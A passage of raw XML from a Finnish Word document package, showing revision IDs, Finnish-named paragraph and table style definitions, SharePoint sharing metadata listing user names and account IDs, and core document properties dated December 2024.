    <w:rsid w:val="00D81808"/>
    <w:rsid w:val="00D82280"/>
    <w:rsid w:val="00D83BEE"/>
    <w:rsid w:val="00D84A2E"/>
    <w:rsid w:val="00D86DF0"/>
    <w:rsid w:val="00D91C28"/>
    <w:rsid w:val="00D92445"/>
    <w:rsid w:val="00D9303B"/>
    <w:rsid w:val="00D93A9C"/>
    <w:rsid w:val="00DA083F"/>
    <w:rsid w:val="00DA1329"/>
    <w:rsid w:val="00DA4067"/>
    <w:rsid w:val="00DB16BC"/>
    <w:rsid w:val="00DB4809"/>
    <w:rsid w:val="00DB4D43"/>
    <w:rsid w:val="00DC3E81"/>
    <w:rsid w:val="00DE4442"/>
    <w:rsid w:val="00DE57D3"/>
    <w:rsid w:val="00DF3E4B"/>
    <w:rsid w:val="00DF642F"/>
    <w:rsid w:val="00E22E24"/>
    <w:rsid w:val="00E25D68"/>
    <w:rsid w:val="00E31375"/>
    <w:rsid w:val="00E31A77"/>
    <w:rsid w:val="00E37948"/>
    <w:rsid w:val="00E40DCB"/>
    <w:rsid w:val="00E45DAE"/>
    <w:rsid w:val="00E45DEB"/>
    <w:rsid w:val="00E56A30"/>
    <w:rsid w:val="00E56D6A"/>
    <w:rsid w:val="00E56D78"/>
    <w:rsid w:val="00E70B15"/>
    <w:rsid w:val="00E713EE"/>
    <w:rsid w:val="00E718B5"/>
    <w:rsid w:val="00E71D3A"/>
    <w:rsid w:val="00E80224"/>
    <w:rsid w:val="00E837C5"/>
    <w:rsid w:val="00E853BE"/>
    <w:rsid w:val="00E853ED"/>
    <w:rsid w:val="00E9201C"/>
    <w:rsid w:val="00E959EB"/>
    <w:rsid w:val="00E96D4D"/>
    <w:rsid w:val="00EA0DA9"/>
    <w:rsid w:val="00EA447C"/>
    <w:rsid w:val="00EA53ED"/>
    <w:rsid w:val="00EB1EF3"/>
    <w:rsid w:val="00EB5907"/>
    <w:rsid w:val="00EC45ED"/>
    <w:rsid w:val="00EC7E87"/>
    <w:rsid w:val="00EE2375"/>
    <w:rsid w:val="00EE2980"/>
    <w:rsid w:val="00EE2E06"/>
    <w:rsid w:val="00EE414F"/>
    <w:rsid w:val="00EF3648"/>
    <w:rsid w:val="00EF490E"/>
    <w:rsid w:val="00EF6CCC"/>
    <w:rsid w:val="00F12336"/>
    <w:rsid w:val="00F140FE"/>
    <w:rsid w:val="00F16A18"/>
    <w:rsid w:val="00F2009F"/>
    <w:rsid w:val="00F269ED"/>
    <w:rsid w:val="00F40C7D"/>
    <w:rsid w:val="00F43B07"/>
    <w:rsid w:val="00F458C9"/>
    <w:rsid w:val="00F51752"/>
    <w:rsid w:val="00F5486A"/>
    <w:rsid w:val="00F566E5"/>
    <w:rsid w:val="00F572BD"/>
    <w:rsid w:val="00F6035C"/>
    <w:rsid w:val="00F66C13"/>
    <w:rsid w:val="00F747D6"/>
    <w:rsid w:val="00F74DFA"/>
    <w:rsid w:val="00F80FFB"/>
    <w:rsid w:val="00F852C1"/>
    <w:rsid w:val="00F92EC8"/>
    <w:rsid w:val="00F968A0"/>
    <w:rsid w:val="00FA000D"/>
    <w:rsid w:val="00FA1693"/>
    <w:rsid w:val="00FA21B7"/>
    <w:rsid w:val="00FA2C6C"/>
    <w:rsid w:val="00FA404A"/>
    <w:rsid w:val="00FB02C7"/>
    <w:rsid w:val="00FB379D"/>
    <w:rsid w:val="00FC086D"/>
    <w:rsid w:val="00FC1A28"/>
    <w:rsid w:val="00FC318F"/>
    <w:rsid w:val="00FC54FC"/>
    <w:rsid w:val="00FC6CA1"/>
    <w:rsid w:val="00FF33BC"/>
    <w:rsid w:val="00FF4372"/>
    <w:rsid w:val="00FF443D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Body Text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Otsikko1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00542BB2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Otsikko2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00542BB2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Otsikko3">
    <w:name w:val="heading 3"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00542BB2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Otsikko4">
    <w:name w:val="heading 4"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed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Otsikko5">
    <w:name w:val="heading 5"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="Otsikko5Char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rsid w:val="00642D93"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="33"/>
      </w:numPr>
      <w:spacing w:after="120" w:line="240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49D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ruudukko3-korostus3">
    <w:name w:val="Medium Grid 3 Accent 3"/>
    <w:basedOn w:val="Normaalitaulukko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155AA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55AA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5A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5AA0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FF33BC"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single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KuvaotsikkoChar">
    <w:name w:val="Kuvaotsikko Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Kuvaotsikko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542BB2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42BB2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542BB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Otsikko1"/>
    <w:next w:val="Normaali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Otsikko1Char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Normaali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KuvaotsikkoChar"/>
    <w:link w:val="Taulukonotsikko"/>
    <w:rsid w:val="00983EBE"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:bCs w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="18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Kappaleenoletusfontti"/>
    <w:rsid w:val="00516B65"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="fn">
    <w:name w:val="fn"/>
    <w:basedOn w:val="Normaali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Normaali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Kappaleenoletusfontti"/>
    <w:rsid w:val="00483165"/>
  </w:style>
  <w:style w:type="character" w:styleId="AvattuHyperlinkki">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Kappaleenoletusfontti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3AB6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Alatunniste">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normaali"/>
    <w:link w:val="Alatunniste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AB6"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Tiivistelm">
    <w:name w:val="Tiivistelmä"/>
    <w:basedOn w:val="Normaali"/>
    <w:autoRedefine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Normaali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Lhdeluettelo">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E9201C"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="OtsikkoChar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Normaalitaulukko"/>
    <w:next w:val="TaulukkoRuudukko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Normaali"/>
    <w:rsid w:val="004873B0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Paikkamerkkiteksti">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="007F1FF7"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Leipteksti">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normaali"/>
    <w:link w:val="LeiptekstiChar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E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c47fc9-00d0-4a0c-96fa-ac5025f46097">
      <UserInfo>
        <DisplayName>Turkia Jenni</DisplayName>
        <AccountId>8308</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Mäkinen Erika</DisplayName>
        <AccountId>6301</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Savenius Sanni</DisplayName>
        <AccountId>8595</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Rantamäki Sanna</DisplayName>
        <AccountId>20892</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Kaitajärvi Tessa</DisplayName>
        <AccountId>19228</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Turunen Niko</DisplayName>
        <AccountId>9524</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Närhi Aku</DisplayName>
        <AccountId>12010</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Matilainen Minka</DisplayName>
        <AccountId>6271</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Tikkala Jasmin</DisplayName>
        <AccountId>19961</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Punkkinen Miia</DisplayName>
        <AccountId>27083</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Sheikh Salma</DisplayName>
        <AccountId>26065</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Kylliäinen Jimi</DisplayName>
        <AccountId>24354</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Orre Oona</DisplayName>
        <AccountId>26634</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Leppänen Emilia</DisplayName>
        <AccountId>26798</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Kivistö Anni</DisplayName>
        <AccountId>25416</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Hilarto Mariella</DisplayName>
        <AccountId>26422</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Eronen Veera</DisplayName>
        <AccountId>25649</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Tikkanen Sole</DisplayName>
        <AccountId>25139</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Sun Viivi</DisplayName>
        <AccountId>24783</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Ihme Viivi</DisplayName>
        <AccountId>24804</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Hiisku Kristian</DisplayName>
        <AccountId>26776</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Tauti Tytti</DisplayName>
        <AccountId>25913</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Rajamäki Elmo</DisplayName>
        <AccountId>9383</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Salmi Antti K</DisplayName>
        <AccountId>28857</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Helenius Janika</DisplayName>
        <AccountId>29076</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Korkalainen Niina</DisplayName>
        <AccountId>29945</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Pesonen Iida</DisplayName>
        <AccountId>33734</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Lohilahti Pekka</DisplayName>
        <AccountId>34335</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Hellberg Otto</DisplayName>
        <AccountId>32526</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Kaartinen Akseli</DisplayName>
        <AccountId>34611</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Alarinne Emilia</DisplayName>
        <AccountId>33462</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Sälpäkivi Kalle</DisplayName>
        <AccountId>32569</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Virolainen Viivi</DisplayName>
        <AccountId>33192</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Palosaari Jesse</DisplayName>
        <AccountId>33586</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Kainulainen Hely</DisplayName>
        <AccountId>33254</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Rönkkönen Janina</DisplayName>
        <AccountId>33151</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Jääskeläinen Vilma</DisplayName>
        <AccountId>12262</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Krivosejeva Juliana</DisplayName>
        <AccountId>29462</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Marttinen Jonna</DisplayName>
        <AccountId>25445</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Latvala Saija</DisplayName>
        <AccountId>24901</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Lahti Heidi</DisplayName>
        <AccountId>33575</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Manninen Jonne</DisplayName>
        <AccountId>33249</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Rintala Edi</DisplayName>
        <AccountId>9878</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Kinnunen Heidi</DisplayName>
        <AccountId>34723</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Ikonen Maija</DisplayName>
        <AccountId>32538</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Vahe Sanni</DisplayName>
        <AccountId>33116</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Sarkkinen Oona</DisplayName>
        <AccountId>33682</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Rahikainen Iina</DisplayName>
        <AccountId>32871</AccountId>
        <AccountType/>
      </UserInfo>
    </SharedWithUsers>
    <_activity xmlns="bdf702fd-cf35-4934-a936-d1d2ffeb52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4E02DB53F3694BAE8A2815798A6289" ma:contentTypeVersion="13" ma:contentTypeDescription="Luo uusi asiakirja." ma:contentTypeScope="" ma:versionID="8b8dacaae8390ff21317fa7a5246f31e">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="bdf702fd-cf35-4934-a936-d1d2ffeb52f4" xmlns:ns4="34c47fc9-00d0-4a0c-96fa-ac5025f46097" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="c66ad74155183ad618ff7c89ee26ca69" ns3:_="" ns4:_="">
    <xsd:import namespace="bdf702fd-cf35-4934-a936-d1d2ffeb52f4"/>
    <xsd:import namespace="34c47fc9-00d0-4a0c-96fa-ac5025f46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702fd-cf35-4934-a936-d1d2ffeb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47fc9-00d0-4a0c-96fa-ac5025f46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DE7C7-14E2-4447-ACB6-9661D0C11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  <ds:schemaRef ds:uri="34c47fc9-00d0-4a0c-96fa-ac5025f46097"/>
    <ds:schemaRef ds:uri="bdf702fd-cf35-4934-a936-d1d2ffeb52f4"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3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4922D-76C3-49EE-9710-1EF4C74C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702fd-cf35-4934-a936-d1d2ffeb52f4"/>
    <ds:schemaRef ds:uri="34c47fc9-00d0-4a0c-96fa-ac5025f46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363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menlaakson ammattikorkeakoulu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</dc:creator>
  <cp:lastModifiedBy>Partinen Lauri</cp:lastModifiedBy>
  <cp:revision>105</cp:revision>
  <cp:lastPrinted>2024-12-16T22:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-03T09:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12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4E4E02DB53F3694BAE8A2815798A6289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</Properties>
</file>